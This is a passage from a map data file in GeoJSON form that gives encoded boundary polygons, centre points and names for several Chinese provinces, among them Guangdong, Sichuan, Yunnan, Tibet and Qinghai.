ZsÐd°wj§@Ĵ®w~^kÀÅKvNmX\\\\¨aŃqvíó¿F¤¡@ũÑVw}S@j}¾«pĂrªg àÀ²NJ¶¶DôK|^ª°LX¾ŴäPĪ±£EXd^¶ĲÞÜ~u¸ǔMRhsRe`ÄofIÔ\\\\Ø  ićymnú¨cj ¢»GČìƊÿÐ¨XeĈĀ¾Oð Fi ¢|[jVxrIQ_EzAN¦zLU`cªxOTu RLÄ¢dVi`p˔vŎµªÉF~Ød¢ºgİàw¸Áb[¦Zb¦z½xBĖ@ªpºlS¸Ö\\\\Ĕ[N¥ˀmĎăJ\\\\ŀ`ňSÚĖÁĐiOĜ«BxDõĚivSÌ}iùÜnÐºG{p°M´wÀÒzJ²ò¨ oTçüöoÛÿñőĞ¤ùTz²CȆȸǎŪƑÐc°dPÎğË¶[È½u¯½WM¡­ÉB·rínZÒ `¨GA¾\\\\pēXhÃRC­üWGġuTé§ŎÑ©ò³I±³}_EÃħg®ęisÁPDmÅ{b[RÅs·kPŽƥóRoOV~]{g\\\\êYƪ¦kÝbiċƵGZ»Ěõó·³vŝ£ø@pyö_ëIkÑµbcÑ§y×dYØªiþ¨[]f]Ņ©C}ÁN»hĻħƏĩ\"]],\"encodeOffsets\":[[[115640,30489]],[[112543,27312]],[[116690,26230]]]}},{\"type\":\"Feature\",\"id\":\"440000\",\"properties\":{\"id\":\"440000\",\"cp\":[113.280637,23.125178],\"name\":\"广东\",\"childNum\":24},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@QdAua\"],[\"@@lxDLo\"],[\"@@sbhNLo\"],[\"@@Ă ā\"],[\"@@WltO[[\"],[\"@@Kr]S\"],[\"@@eI]y\"],[\"@@I|Mym\"],[\"@@Û³LS¼Y\"],[\"@@nvºBëui©`¾\"],[\"@@zdÛJw®\"],[\"@@°¯\"],[\"@@a yAª¸ËJIxØ@ĀHAmÃV¡ofuo\"],[\"@@sŗÃÔėAƁZÄ ~°ČPäh\"],[\"@@¶ÝÌvmĞh­ıQ\"],[\"@@HdSjĒ¢D}waru«ZqadYM\"],[\"@@el\\\\LqqU\"],[\"@@~rMo\\\\\"],[\"@@f^C\"],[\"@@øPªoj÷ÍÝħXČx°Q¨ıXNv\"],[\"@@gÇƳo[~tly\"],[\"@@EÆC¿\"],[\"@@OP\"],[\"@@wđógĝ[³¡VÙæÅöMÌ³¹pÁaËýý©D©ÜJŹƕģGą¤{ÙūÇO²«BƱéAÒĥ¡«BhlmtÃPµyU¯ucd·w_bŝcīímGO|KPȏŹãŝIŕŭŕ@Óoo¿ē±ß}ŭĲWÈCőâUâǙIğŉ©IĳE×Á³AówXJþ±ÌÜÓĨ£L]ĈÙƺZǾĆĖMĸĤfÎĵlŨnÈĐtFFĤêk¶^k°f¶g}®Faf`vXŲxl¦ÔÁ²¬Ð¦pqÊÌ²iXØRDÎ}Ä@ZĠsx®AR~®ETtĄZƈfŠŠHâÒÐAµ\\\\S¸^wĖkRzalŜ|E¨ÈNĀňZTpBh£\\\\ĎƀuXĖtKL¶G|»ĺEļĞ~ÜĢÛĊrOÙîvd]n¬VÊĜ°RÖpMƂªFbwEÀ©\\\\¤]ŸI®¥D³|Ë]CöAŤ¦æ´¥¸Lv¼¢ĽBaôF~®²GÌÒEYzk¤°ahlVÕI^CxĈPsBƒºV¸@¾ªR²ĨN]´_eavSivc}p}Đ¼ƌkJÚe th_¸ ºx±ò_xNË²@ă¡ßH©Ùñ}wkNÕ¹ÇO½¿£ĕ]ly_WìIÇª`uTÅxYĒÖ¼kÖµMjJÚwn\\\\hĒv]îh|ÈƄøèg¸Ķß ĉĈWb¹ƀdéĘNTtP[öSvrCZaGubo´ŖÒÇĐ~¡zCIözx¢PnÈñ @ĥÒ¦]ƞV}³ăĔñiiÄÓVépKG½ÄÓávYoC·sitiaÀyŧÎ¡ÈYDÑům}ý|m[węõĉZÅxUO}÷N¹³ĉo_qtăqwµŁYÙǝŕ¹tïÛUÃ¯mRCºĭ|µÕÊK½Rē ó]GªęAx»HO£|ām¡diď×YïYWªŉOeÚtĐ«zđ¹TāúEá²\\\\ķÍ}jYàÙÆſ¿Çdğ·ùTßÇţʄ¡XgWÀǇğ·¿ÃOj YÇ÷Qěi\"]],\"encodeOffsets\":[[[117381,22988]],[[116552,22934]],[[116790,22617]],[[116973,22545]],[[116444,22536]],[[116931,22515]],[[116496,22490]],[[116453,22449]],[[113301,21439]],[[118726,21604]],[[118709,21486]],[[113210,20816]],[[115482,22082]],[[113171,21585]],[[113199,21590]],[[115232,22102]],[[115739,22373]],[[115134,22184]],[[113056,21175]],[[119573,21271]],[[119957,24020]],[[115859,22356]],[[116561,22649]],[[116285,22746]]]}},{\"type\":\"Feature\",\"id\":\"450000\",\"properties\":{\"id\":\"450000\",\"cp\":[108.320004,22.82402],\"name\":\"广西\",\"childNum\":2},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@H TQ§A\"],[\"@@ĨÊªLƊDÎĹĐCǦė¸zÚGn£¾rªŀÜt¬@ÖÚSx~øOŒŶÐÂæȠ\\\\ÈÜObĖw^oÞLf¬°bI lTØBÌF£Ć¹gñĤaYt¿¤VSñK¸¤nM¼JE±½¸ñoÜCƆæĪ^ĚQÖ¦^f´QüÜÊz¯lzUĺš@ìp¶n]sxtx¶@~ÒĂJb©gk{°~c°`Ô¬rV\\\\la¼¤ôá`¯¹LCÆbxEræOv[H­[~|aB£ÖsºdAĐzNÂðsÞÆĤªbab`ho¡³F«èVlo¤ÔRzpp®SĪº¨ÖºNĳd`a¦¤F³ºDÎńĀìCĜº¦Ċ~nS|gźvZkCÆj°zVÈÁƔ]LÊFZgčP­kini«qÇczÍY®¬Ů»qR×ō©DÕ§ƙǃŵTÉĩ±ıdÑnYYĲvNĆĆØÜ Öp}e³¦m©iÓ|¹ħņ|ª¦QF¢Â¬ʖovg¿em^ucà÷gÕuíÙćĝ}FĻ¼Ĺ{µHKsLSđƃrč¤[AgoSŇYMÿ§Ç{FśbkylQxĕ]T·¶[BÑÏGáşşƇeăYSs­FQ}­BwtYğÃ@~CÍQ ×WjË±rÉ¥oÏ ±«ÓÂ¥kwWűmcih³K~µh¯e]lµélEģEďsmÇŧē`ãògK_ÛsUʝćğ¶höO¤Ǜn³c`¡y¦CezYwa[ďĵűMę§]XÎ_íÛ]éÛUćİÕBƣ±dy¹T^dûÅÑŦ·PĻþÙ`K¦¢ÍeĥR¿³£[~äu¼dltW¸oRM¢ď\\\\z}Æzdvň{ÎXF¶°Â_ÒÂÏL©ÖTmu¼ãlīkiqéfA·Êµ\\\\őDc¥ÝFyÔćcűH_hLÜêĺĐ¨c}rn`½Ì@¸¶ªVLhŒ\\\\Ţĺk~Ġið°|gtTĭĸ^xvKVGréAébUuMJVÃO¡qĂXËSģãlýà_juYÛÒBG^éÖ¶§EGÅzěƯ¤EkN[kdåucé¬dnYpAyČ{`]þ¯TbÜÈk¡ĠvàhÂƄ¢Jî¶²\"]],\"encodeOffsets\":[[[111707,21520]],[[107619,25527]]]}},{\"type\":\"Feature\",\"id\":\"460000\",\"properties\":{\"id\":\"460000\",\"cp\":[109.83119,19.031971],\"name\":\"海南\",\"childNum\":1},\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@¦Ŝil¢XƦƞòïè§ŞCêɕrŧůÇąĻõ·ĉ³œ̅kÇm@ċȧŧĥĽʉ­ƅſȓÒË¦ŝE}ºƑ[ÍĜȋ gÎfǐÏĤ¨êƺ\\\\Ɔ¸ĠĎvʄȀÐ¾jNðĀÒRZǆzÐŘÎ°H¨Ƣb²_Ġ \"],\"encodeOffsets\":[[112750,20508]]}},{\"type\":\"Feature\",\"id\":\"510000\",\"properties\":{\"id\":\"510000\",\"cp\":[104.065735,30.659462],\"name\":\"四川\",\"childNum\":2},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@LqKr\"],[\"@@[ĻéV£_ţġñpG réÏ·~ąSfy×Í·ºſƽiÍıƣıĻmHH}siaX@iÇ°ÁÃ×t«­T¤JJJyJÈ`Ohß¦¡uËhIyCjmÿwZGTiSsOB²fNmsPa{M{õE^Hj}gYpaeu¯oáwHjÁ½M¡pMuåmni{fk\\\\oÎqCwEZ¼KĝAy{m÷LwO×SimRI¯rKõBS«sFe]fµ¢óY_ÆPRcue°Cbo×bd£ŌIHgtrnyPt¦foaXďxlBowz_{ÊéWiêEGhÜ¸ºuFĈIxf®Y½ĀǙ]¤EyF²ċw¸¿@g¢§RGv»áW`ÃĵJwi]t¥wO­½a[×]`Ãi­üL¦LabbTÀåc}ÍhÆh®BHî|îºÉk­¤Sy£ia©taį·Ɖ`ō¥UhOĝLk}©Fos´JmµlŁuønÑJWÎªYÀïAetTŅÓGË«bo{ıwodƟ½OġÜÂµxàNÖ¾P²§HKv¾]|BÆåoZ`¡Ø`ÀmºĠ~ÌÐ§nÇ¿¤]wğ@srğu~Io[é±¹ ¿ſđÓ@qg¹zƱřaí°KtÇ¤V»Ã[ĩǭƑ^ÇÓ@áťsZÏÅĭƋěpwDóÖáŻneQËq·GCœýS]x·ýq³OÕ¶Qzßti{řáÍÇWŝŭñzÇWpç¿JXĩè½cFÂLiVjx}\\\\NŇĖ¥GeJA¼ÄHfÈu~¸Æ«dE³ÉMA|bÒćhG¬CMõƤąAvüVéŀ_VÌ³ĐwQj´·ZeÈÁ¨X´Æ¡Qu·»ÕZ³ġqDoy`L¬gdp°şp¦ėìÅĮZ°Iähzĵf²å ĚÑKpIN|Ñz]ń·FU×é»R³MÉ»GM«kiér}Ã`¹ăÞmÈnÁîRǀ³ĜoİzŔwǶVÚ£À]ɜ»ĆlƂ²ĠþTº·àUȞÏʦ¶I«dĽĢdĬ¿»Ĕ×h\\\\c¬ä²GêëĤł¥ÀǿżÃÆMº}BÕĢyFVvwxBèĻĒ©ĈtCĢɽŠȣ¦āæ·HĽîôNÔ~^¤Ɗu^s¼{TA¼ø°¢İªDè¾Ň¶ÝJ®Z´ğ~Sn|ªWÚ©òzPOȸbð¢|øĞŒQìÛÐ@ĞǎRS¤Á§di´ezÝúØã]HqkIþËQÇ¦ÃsÇ¤[E¬ÉŪÍxXƒ·ÖƁİlƞ¹ª¹|XÊwnÆƄmÀêErĒtD®ċæcQE®³^ĭ¥©l}äQtoŖÜqÆkµªÔĻĴ¡@Ċ°B²Èw^^RsºTĀ£ŚæQPJvÄz^Đ¹Æ¯fLà´GC²dt­ĀRt¼¤ĦOðğfÔðDŨŁĞƘïPÈ®âbMüÀXZ ¸£@Å»»QÉ­]dsÖ×_Í_ÌêŮPrĔĐÕGĂeZÜîĘqBhtO ¤tE[h|YÔZśÎs´xº±Uñt|OĩĠºNbgþJy^dÂY Į]Řz¦gC³R`Āz¢Aj¸CL¤RÆ»@­Ŏk\\\\Ç´£YW}z@Z}Ã¶oû¶]´^NÒ}èNªPÍy¹`S°´ATeVamdUĐwʄvĮÕ\\\\uÆŗ¨Yp¹àZÂmWh{á}WØǍÉüwga§áCNęÎ[ĀÕĪgÖÉªXøx¬½Ů¦¦[NÎLÜUÖ´òrÙŠxR^JkĳnDX{U~ET{ļº¦PZcjF²Ė@pg¨B{u¨ŦyhoÚD®¯¢ WòàFÎ¤¨GDäz¦kŮPġqË¥À]eâÚ´ªKxīPÖ|æ[xÃ¤JÞĥsNÖ½I¬nĨY´®ÐƐmDŝuäđđEbee_v¡}ìęǊē}qÉåT¯µRs¡M@}ůaa­¯wvƉåZw\\\\Z{åû^\"]],\"encodeOffsets\":[[[108815,30935]],[[110617,31811]]]}},{\"type\":\"Feature\",\"id\":\"520000\",\"properties\":{\"id\":\"520000\",\"cp\":[106.713478,26.578343],\"name\":\"贵州\",\"childNum\":3},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@G\\\\lY£in\"],[\"@@q|mc¯tÏVSÎ\"],[\"@@hÑ£IsNgßHHªķÃh_¹¡ĝÄ§ń¦uÙùgS¯JH|sÝÅtÁïyMDč»eÕtA¤{b\\\\}G®u\\\\åPFqwÅaDK°ºâ_£ùbµmÁÛĹM[q|hlaªāI}Ñµ@swtwm^oµDéĽŠyVky°ÉûÛR³e¥]RÕěħ[ƅåÛDpJiVÂF²I»mN·£LbÒYbWsÀbpkiTZĄă¶Hq`ĥ_J¯ae«KpÝx]aĕÛPÇȟ[ÁåŵÏő÷Pw}TÙ@Õs«ĿÛq©½m¤ÙH·yǥĘĉBµĨÕnđ]K©œáGçş§ÕßgǗĦTèƤƺ{¶ÉHÎd¾ŚÊ·OÐjXWrãLyzÉAL¾ę¢bĶėy_qMĔąro¼hĊw¶øV¤w²Ĉ]ÊKx|`ź¦ÂÈdrcÈbe¸`I¼čTF´¼Óýȃr¹ÍJ©k_șl³´_pĐ`oÒh¶pa^ÓĔ}D»^Xy`d[KvJPhèhCrĂĚÂ^Êƌ wZL­Ġ£ÁbrzOIlMMĪŐžËr×ÎeŦtw|¢mKjSǘňĂStÎŦEtqFT¾Eì¬¬ôxÌO¢ K³ŀºäYPVgŎ¦ŊmŞ¼VZwVlz¤£Tl®ctĽÚó{G­AÇge~Îd¿æaSba¥KKûj®_Ä^\\\\Ø¾bP®¦x^sxjĶI_Ä Xâ¼Hu¨Qh¡À@Ëô}±GNìĎlT¸`V~R°tbÕĊ`¸úÛtÏFDu[MfqGH·¥yAztMFe|R_GkChZeÚ°tov`xbDnÐ{E}ZèxNEÞREn[Pv@{~rĆAB§EO¿|UZ~ìUf¨J²ĂÝÆsªB`s¶fvö¦Õ~dÔq¨¸º»uù[[§´sb¤¢zþF¢ÆÀhÂW\\\\ıËIÝo±ĭŠ£þÊs}¡R]ěDg´VG¢j±®èºÃmpU[Áëº°rÜbNu¸}º¼`niºÔXĄ¤¼ÔdaµÁ_ÃftQQgR·Ǔv}Ý×ĵ]µWc¤F²OĩųãW½¯K©]{LóµCIµ±Mß¿h©āq¬o½~@i~TUxŪÒ¢@£ÀEîôruńb[§nWuMÆLl¿]x}ĳ­½\"]],\"encodeOffsets\":[[[112158,27383]],[[112105,27474]],[[112095,27476]]]}},{\"type\":\"Feature\",\"id\":\"530000\",\"properties\":{\"id\":\"530000\",\"cp\":[101.512251,24.740609],\"name\":\"云南\",\"childNum\":1},\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@[ùx½}ÑRHYīĺûsÍniEoã½Ya²ė{c¬ĝgĂsAØÅwďõzFjw}«Dx¿}Uũlê@HÅ­F¨ÇoJ´Ónũuą¡Ã¢pÒÅØ TF²xa²ËXcÊlHîAßËŁkŻƑŷÉ©hW­æßUËs¡¦}teèÆ¶StÇÇ}Fd£jĈZĆÆ¤Tč\\\\D}O÷£U§~ŃGåŃDĝ¸Tsd¶¶Bª¤u¢ŌĎo~t¾ÍŶÒtD¦ÚiôözØX²ghįh½Û±¯ÿm·zR¦Ɵ`ªŊÃh¢rOÔ´£Ym¼èêf¯ŪĽncÚbw\\\\zlvWªâ ¦gmĿBĹ£¢ƹřbĥkǫßeeZkÙIKueT»sVesbaĕ  ¶®dNĄÄpªy¼³BE®lGŭCǶwêżĔÂepÍÀQƞpC¼ŲÈ­AÎô¶RäQ^Øu¬°_Èôc´¹ò¨PÎ¢hlĎ¦´ĦÆ´sâÇŲPnÊD^¯°Upv}®BPÌªjǬxSöwlfòªvqĸ|`H­viļndĜ­Ćhňem·FyÞqóSį¯³X_ĞçêtryvL¤§z¦c¦¥jnŞklD¤øz½ĜàĂŧMÅ|áƆàÊcðÂFÜáŢ¥\\\\\\\\ºİøÒÐJĴîD¦zK²ǏÎEh~CD­hMn^ÌöÄ©ČZÀaüfɭyœpį´ěFűk]Ôě¢qlÅĆÙa¶~ÄqêljN¬¼HÊNQ´ê¼VØ¸E^ŃÒyM{JLoÒęæe±Ķygã¯JYÆĭĘëo¥Šo¯hcK«z_prC´ĢÖY¼ v¸¢RÅW³Â§fÇ¸Yi³xR´ďUË`êĿUûuĆBƣöNDH«ĈgÑaB{ÊNF´¬c·Åv}eÇÃGB»If¦HňĕM~[iwjUÁKE¾dĪçWIèÀoÈXòyŞŮÈXâÎŚj|àsRyµÖPr´þ ¸^wþTDŔHr¸RÌmfżÕâCôoxĜƌÆĮÐYtâŦÔ@]ÈǮƒ\\\\Ī¼Ä£UsÈ¯LbîƲŚºyhr@ĒÔƀÀ²º\\\\êpJ}ĠvqtĠ@^xÀ£È¨mËÏğ}n¹_¿¢×Y_æpÅA^{½Lu¨GO±Õ½ßM¶wÁĢÛPƢ¼pcĲx|apÌ¬HÐŊSfsðBZ¿©XÏÒKk÷Eû¿SrEFsÕūkóVǥŉiTL¡n{uxţÏhôŝ¬ğōNNJkyPaqÂğ¤K®YxÉƋÁ]āęDqçgOgILu\\\\_gz]W¼~CÔē]bµogpÑ_oď`´³Țkl`IªºÎȄqÔþ»E³ĎSJ»_f·adÇqÇc¥Á_Źw{L^É±ćxU£µ÷xgĉp»ĆqNē`rĘzaĵĚ¡K½ÊBzyäKXqiWPÏÉ¸½řÍcÊG|µƕƣGË÷k°_^ý|_zċBZocmø¯hhcæ\\\\lMFlư£ĜÆyHF¨µêÕ]HAàÓ^it `þßäkĤÎT~Wlÿ¨ÔPzUCNVv [jâôDôď[}z¿msSh¯{jïğl}šĹ[őgK©U·µË@¾m_~q¡f¹ÅË^»f³ø}Q¡ÖË³gÍ±^Ç\\\\ëÃA_¿bWÏ[¶ƛé£F{īZgm@|kHǭƁć¦UĔť×ë}ǝeďºȡȘÏíBÉ£āĘPªĳ¶ŉÿy©nď£G¹¡I±LÉĺÑdĉÜW¥}gÁ{aqÃ¥aıęÏZï`\"],\"encodeOffsets\":[[104636,22969]]}},{\"type\":\"Feature\",\"id\":\"540000\",\"properties\":{\"id\":\"540000\",\"cp\":[89.132212,30.860361],\"name\":\"西藏\",\"childNum\":1},\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@ÂhľxŖxÒVºÅâAĪÝȆµę¯Ňa±r_w~uSÕňqOj]ɄQ£ZUDûoY»©M[L¼qãË{VÍçWVi]ë©Ä÷àyƛhÚU°adcQ~Mx¥cc¡ÙaSyFÖk­uRýq¿ÔµQĽ³aG{¿FµëªéĜÿª@¬·K·àariĕĀ«V»ŶĴūgèLǴŇƶaftèBŚ£^âǐÝ®M¦ÁǞÿ¬LhJ¾óƾÆºcxwf]Y´¦|QLn°adĊ\\\\¨oǀÍŎ´ĩĀd`tÊQŞŕ|¨C^©Ĉ¦¦ÎJĊ{ëĎjª²rÐl`¼Ą[t|¦Stè¾PÜK¸dƄı]s¤î_v¹ÎVòŦj£Əsc¬_Ğ´|Ł¦Av¦w`ăaÝaa­¢e¤ı²©ªSªÈMĄwÉØŔì@T¤Ę\\\\õª@þo´­xA sÂtŎKzó´ÇĊµ¢r^nĊ­Æ¬×üG¢³ {âĊ]G~bÀgVjzlhǶfOfdªB]pjTOtĊn¤}®¦Č¥d¢¼»ddY¼t¢eȤJ¤}Ǿ¡°§¤AÐlc@ĝsªćļđAçwxUuzEÖġ~AN¹ÄÅȀŻ¦¿ģŁéì±Hãd«g[Ø¼ēÀcīľġ¬cJµÐʥVȝ¸ßS¹ý±ğkƁ¼ą^ɛ¤Ûÿb[}¬ōõÃ]ËNm®g@Bg}ÍF±ǐyL¥íCIĳÏ÷Ñį[¹¦[âšEÛïÁÉdƅß{âNÆāŨß¾ě÷yC£k­´ÓH@Â¹TZ¥¢į·ÌAÐ§®Zcv½Z­¹|ÅWZqgW|ieZÅYVÓqdqbc²R@c¥Rã»GeeƃīQ}J[ÒK¬Ə|oėjġĠÑN¡ð¯EBčnwôɍėª²CλŹġǝʅįĭạ̃ūȹ]ΓͧgšsgȽóϧµǛęgſ¶ҍć`ĘąŌJÞä¤rÅň¥ÖÁUětęuůÞiĊÄÀ\\\\Æs¦ÓRb|Â^řÌkÄŷ¶½÷f±iMÝ@ĥ°G¬ÃM¥n£Øąğ¯ß§aëbéüÑOčk£{\\\\eµª×MÉfm«Ƒ{Å×Gŏǩãy³©WÑăû··Qòı}¯ãIéÕÂZ¨īès¶ZÈsæĔTŘvgÌsN@îá¾ó@ÙwU±ÉTå»£TđWxq¹Zobs[×¯cĩvėŧ³BM|¹kªħ¥TzNYnÝßpęrñĠĉRS~½ěVVµõ«M££µBĉ¥áºae~³AuĐh`Ü³ç@BÛïĿa©|z²Ý¼D£àč²ŸIûI āóK¥}rÝ_Á´éMaň¨~ªSĈ½½KÙóĿeƃÆB·¬ën×W|Uº}LJrƳlŒµ`bÔ`QÐÓ@s¬ñIÍ@ûws¡åQÑßÁ`ŋĴ{ĪTÚÅTSÄ³Yo|Ç[Ç¾µMW¢ĭiÕØ¿@MhpÕ]jéò¿OƇĆƇpêĉâlØwěsǩĵ¸cbU¹ř¨WavquSMzeo_^gsÏ·¥Ó@~¯¿RiīB\\\\qTGªÇĜçPoÿfñòą¦óQīÈáPābß{ZŗĸIæÅhnszÁCËìñÏ·ąĚÝUm®ó­L·ăUÈíoù´Êj°ŁŤ_uµ^°ìÇ@tĶĒ¡ÆM³Ģ«İĨÅ®ğRāðggheÆ¢zÊ©Ô\\\\°ÝĎz~ź¤PnMĪÖB£kné§żćĆKĒ°¼L¶èâz¨u¦¥LDĘz¬ýÎmĘd¾ßFzhg²Fy¦ĝ¤ċņbÎ@yĄæm°NĮZRÖíJ²öLĸÒ¨Y®ƌÐVàtt_ÚÂyĠz]ŢhzĎ{ÂĢXc|ÐqfO¢¤ögÌHNPKŖUú´xx[xvĐCûĀìÖT¬¸^}Ìsòd´_KgžLĴÀBon|H@Êx¦BpŰŌ¿fµƌA¾zǈRx¶FkĄźRzŀ~¶[´HnªVƞuĒ­È¨ƎcƽÌm¸ÁÈM¦x͊ëÀxǆBú^´W£dkɾĬpw˂ØɦļĬIŚÊnŔa¸~J°îlɌxĤÊÈðhÌ®gT´øàCÀ^ªerrƘd¢İP|Ė ŸWªĦ^¶´ÂLaT±üWƜǀRÂŶUńĖ[QhlLüAÜ\\\\qRĄ©\"],\"encodeOffsets\":[[90849,37210]]}},{\"type\":\"Feature\",\"id\":\"610000\",\"properties\":{\"id\":\"610000\",\"cp\":[108.948024,34.263161],\"name\":\"陕西\",\"childNum\":1},\"geometry\":{\"type\":\"Polygon\",\"coordinates\":[\"@@p¢ȮµûGĦ}Ħðǚ¶òƄjɂz°{ºØkÈęâ¦jªBg\\\\ċ°s¬]jú EȌǆ¬stRÆdĠİwÜ¸ôW¾ƮłÒ_{Ìû¼jº¹¢GǪÒ¯ĘZ`ºŊecņą~BÂgzpâēòYǠȰÌTÎ¨ÂW|fcă§uF@N¢XLRMº[ğȣſï|¥Jkc`sŉǷY¹W@µ÷Kãï³ÛIcñ·VȋÚÒķø©þ¥yÓğęmWµÎumZyOŅƟĥÓ~sÑL¤µaÅY¦ocyZ{y c]{Ta©`U_Ěē£ωÊƍKùK¶ȱÝƷ§{û»ÅÁȹÍéuĳ|¹cÑdìUYOuFÕÈYvÁCqÓTǢí§·S¹NgV¬ë÷Át°DØ¯C´ŉƒópģ}ċcEËFéGU¥×K§­¶³BČ}C¿åċ`wġB·¤őcƭ²ő[Å^axwQOÿEËßŚĤNĔwƇÄńwĪ­o[_KÓª³ÙnKÇěÿ]ďă_d©·©Ýŏ°Ù®g]±ßå¬÷m\\\\iaǑkěX{¢|ZKlçhLtŇîŵœè[É@ƉĄEtƇÏ³­ħZ«mJ×¾MtÝĦ£IwÄå\\\\Õ{OwĬ©LÙ³ÙgBƕŀrÌĢŭO¥lãyC§HÍ£ßEñX¡­°ÙCgpťzb`wIvA|§hoĕ@E±iYd¥OĻ¹S|}F@¾oAO²{tfÜ¢FǂÒW²°BĤh^Wx{@¬­F¸¡ķn£P|ªĴ@^ĠĈæbÔc¶lYi^MicĎ°Â[ävï¶gv@ÀĬ·lJ¸sn|¼u~a]ÆÈtŌºJpþ£KKf~¦UbyäIĺãnÔ¿^­ŵMThĠÜ¤ko¼Ŏìąǜh`[tRd²Ĳ_XPrɲlXiL§à¹H°Ȧqº®QCbAŌJ¸ĕÚ³ĺ§ `d¨YjiZvRĺ±öVKkjGȊÄePĞZmļKÀ[`ösìhïÎoĬdtKÞ{¬èÒÒBÔpĲÇĬJŊ¦±J«Y§@·pHµàåVKepWftsAÅqC·¬ko«pHÆuK@oHĆÛķhxenS³àǍrqƶRbzy¸ËÐl¼EºpĤ¼x¼½~Ğà@ÚüdK^mÌSj\"],\"encodeOffsets\":[[110234,38774]]}},{\"type\":\"Feature\",\"id\":\"620000\",\"properties\":{\"id\":\"620000\",\"cp\":[103.823557,36.058039],\"name\":\"甘肃\",\"childNum\":2},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@VuUv\"],[\"@@ũEĠtt~nkh`Q¦ÅÄÜdwAb×ĠąJ¤DüègĺqBqj°lI¡ĨÒ¤úSHbjÎB°aZ¢KJO[|A£Dx}NĂ¬HUnrk kp¼Y kMJn[aGáÚÏ[½rc}aQxOgsPMnUsncZsKúvAtÞġ£®ĀYKdnFw¢JE°Latf`¼h¬we|Æbj}GA·~W`¢MC¤tL©Ĳ°qdfObÞĬ¹ttu`^ZúE`[@Æsîz®¡CƳƜG²R¢RmfwĸgÜą G@pzJM½mhVy¸uÈÔO±¨{LfæU¶ßGĂq\\\\ª¬²I¥IŉÈīoıÓÑAçÑ|«LÝcspīðÍgtë_õ\\\\ĉñLYnĝgRǡÁiHLlõUĹ²uQjYi§Z_c¨´ĹĖÙ·ŋIaBD­R¹ȥr¯GºßK¨jWkɱOqWĳ\\\\a­Q\\\\sg_ĆǛōëp»£lğÛgSŶN®À]ÓämĹãJaz¥V}Le¤Lýo¹IsŋÅÇ^bz³tmEÁ´a¹cčecÇNĊãÁ\\\\č¯dNj]jZµkÓdaćå]ğĳ@ ©O{¤ĸm¢E·®«|@Xwg]Aģ±¯XǁÑǳªcwQÚŝñsÕ³ÛV_ý¥\\\\ů¥©¾÷w©WÕÊĩhÿÖÁRo¸V¬âDb¨hûxÊ×ǌ~Zâg|XÁnßYoº§ZÅŘv[ĭÖʃuďxcVbnUSfB¯³_TzºÎO©çMÑ~M³]µ^püµÄY~y@X~¤Z³[Èōl@®Å¼£QK·Di¡ByÿQ_´D¥hŗy^ĭÁZ]cIzýah¹MĪğPs{ò²Vw¹t³ŜË[Ñ}X\\\\gsF£sPAgěp×ëfYHāďÖqēŭOÏëdLü\\\\it^c®RÊº¶¢H°mrY£B¹čIoľu¶uI]vģSQ{UŻÅ}QÂ|Ì°ƅ¤ĩŪU ęĄÌZÒ\\\\v²PĔ»ƢNHĂyAmƂwVm`]ÈbH`Ì¢²ILvĜH®¤Dlt_¢JJÄämèÔDëþgºƫaʎÌrêYi~ Îİ¤NpÀA¾Ĕ¼bð÷®üszMzÖĖQdȨýv§Tè|ªHÃ¾a¸|Ð ƒwKĢx¦ivr^ÿ ¸l öæfƟĴ·PJv}n\\\\h¹¶v·À|\\\\ƁĚN´ĜçèÁz]ġ¤²¨QÒŨTIlªťØ}¼˗ƦvÄùØEÂ«FïËIqōTvāÜŏíÛßÛVj³âwGăÂíNOPìyV³ŉĖýZso§HÑiYw[ß\\\\X¦¥c]ÔƩÜ·«jÐqvÁ¦m^ċ±R¦΋ƈťĚgÀ»IïĨʗƮ°ƝĻþÍAƉſ±tÍEÕÞāNUÍ¡\\\\ſčåÒʻĘm ƭÌŹöʥëQ¤µ­ÇcƕªoIýIÉ_mkl³ăƓ¦j¡YzŇi}Msßõīʋ }ÁVm_[n}eı­Uĥ¼ªI{Î§DÓƻėojqYhĹT©oūĶ£]ďxĩǑMĝq`B´ƃ˺Чç~²ņj@¥@đ´ί}ĥtPńÇ¾V¬ufÓÉCtÓ̻¹£G³]ƖƾŎĪŪĘ̖¨ʈĢƂlɘ۪üºňUðǜȢƢż̌ȦǼĤŊɲĖÂ­Kq´ï¦ºĒǲņɾªǀÞĈĂD½ĄĎÌŗĞrôñnN¼â¾ʄľԆ|Ǆ֦ज़ȗǉ̘̭ɺƅêgV̍ʆĠ·ÌĊv|ýĖÕWĊǎÞ´õ¼cÒÒBĢ͢UĜð͒s¨ňƃLĉÕÝ@ɛƯ÷¿Ľ­ĹeȏĳëCȚDŲyê×Ŗyò¯ļcÂßYtÁƤyAã˾J@ǝrý@¤rz¸oP¹ɐÚyáHĀ[JwcVeȴÏ»ÈĖ}ƒŰŐèȭǢόĀƪÈŶë;Ñ̆ȤМľĮEŔĹŊũ~ËUă{ĻƹɁύȩþĽvĽƓÉ@ēĽɲßǐƫʾǗĒpäWÐxnsÀ^ƆwW©¦cÅ¡Ji§vúF¶¨c~c¼īeXǚ\\\\đ¾JwÀďksãAfÕ¦L}waoZD½Ml«]eÒÅaÉ²áo½FõÛ]ĻÒ¡wYR£¢rvÓ®y®LFLzĈôe]gx}|KK}xklL]c¦£fRtív¦PĤoH{tK\"]],\"encodeOffsets\":[[[108619,36299]],[[108589,36341]]]}},{\"type\":\"Feature\",\"id\":\"630000\",\"properties\":{\"id\":\"630000\",\"cp\":[96.778916,35.623178],\"name\":\"青海\",\"childNum\":2},\"geometry\":{\"type\":\"MultiPolygon\",\"coordinates\":[[\"@@InJm\"],[\"@@CÆ½OŃĦsΰ~Ē³¦@@Ņi±è}ШƄ˹A³r_ĞǒNĪĐw¤^ŬĵªpĺSZgrpiƼĘÔ¨C|ÍJ©Ħ»®VĲ~f\\\\m `UnÂ~ʌĬàöNt~ňjy¢ZiƔ¥Ąk´nl`JÊJþ©pdƖ®È£¶ìRʦźõƮËnʼėæÑƀĎ[¢VÎĂMÖÝÎF²sƊƀÎBļýƞ¯ʘƭðħ¼Jh¿ŦęΌƇ¥²Q]Č¥nuÂÏri¸¬ƪÛ^Ó¦d¥[Wà